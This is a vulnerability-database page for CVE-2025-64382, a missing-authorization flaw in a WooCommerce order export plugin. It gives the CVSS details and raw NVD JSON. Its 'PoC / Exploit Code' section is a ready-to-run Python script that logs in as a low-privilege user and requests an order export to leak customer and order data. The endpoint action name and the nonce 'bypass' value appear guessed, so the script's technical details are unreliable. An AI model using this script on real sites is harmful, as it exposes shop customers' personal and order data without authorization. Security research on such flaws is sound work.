Security Vulnerability Report
中文
CVE-2025-64382 CVSS 4.3 MEDIUM

CVE-2025-64382

Published: 2025-11-13 10:15:54
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in WebToffee Order Export & Order Import for WooCommerce order-import-export-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Order Export & Order Import for WooCommerce: from n/a through <= 2.6.7.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WebToffee Order Export & Order Import for WooCommerce (order-import-export-for-woocommerce) 所有版本 <= 2.6.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-64382 PoC - Missing Authorization in WebToffee WooCommerce Plugin # Target: WordPress site with vulnerable WebToffee Order Export & Order Import plugin <= 2.6.7 def exploit_cve_2025_64382(target_url, wp_admin_user, wp_admin_pass): """ Exploit missing authorization vulnerability in WebToffee plugin. This PoC demonstrates how a low-privilege user can export orders without proper authorization. """ session = requests.Session() # Step 1: Login as low-privilege user login_url = f"{target_url}/wp-login.php" login_data = { 'log': wp_admin_user, 'pwd': wp_admin_pass, 'rememberme': 'forever', 'wp-submit': 'Log In' } try: resp = session.post(login_url, data=login_data, timeout=10) print(f"[+] Login attempt status: {resp.status_code}") # Step 2: Identify vulnerable endpoint (plugin's AJAX handler) # The plugin registers AJAX actions without proper capability checks vulnerable_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/wc/v3/orders' ] # Step 3: Craft request to trigger order export without admin privileges export_params = { 'action': 'wt_order_export_order', 'wt_order_export_nonce': ' bypass_this_nonce', 'export_type': 'order', 'selected_format': 'csv' } ajax_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_resp = session.get(ajax_url, params=export_params, timeout=10) if exploit_resp.status_code == 200: print(f"[+] Exploit sent - Status: {exploit_resp.status_code}") print(f"[+] Response size: {len(exploit_resp.content)} bytes") if 'order' in exploit_resp.text.lower() or 'customer' in exploit_resp.text.lower(): print("[!] VULNERABLE: Order data leaked via unauthorized access!") print(f"[!] Sample data: {exploit_resp.text[:500]}") else: print("[-] No obvious data leakage detected") else: print(f"[-] Request failed with status: {exploit_resp.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False return True if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2025-64382.py <target_url> <username> <password>") print("Example: python cve-2025-64382.py http://example.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] print(f"[*] Targeting: {target}") print(f"[*] Authenticating as: {user}") exploit_cve_2025_64382(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64382", "sourceIdentifier": "[email protected]", "published": "2025-11-13T10:15:54.323", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WebToffee Order Export & Order Import for WooCommerce order-import-export-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Order Export & Order Import for WooCommerce: from n/a through <= 2.6.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/order-import-export-for-woocommerce/vulnerability/wordpress-order-export-order-import-for-woocommerce-plugin-2-6-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}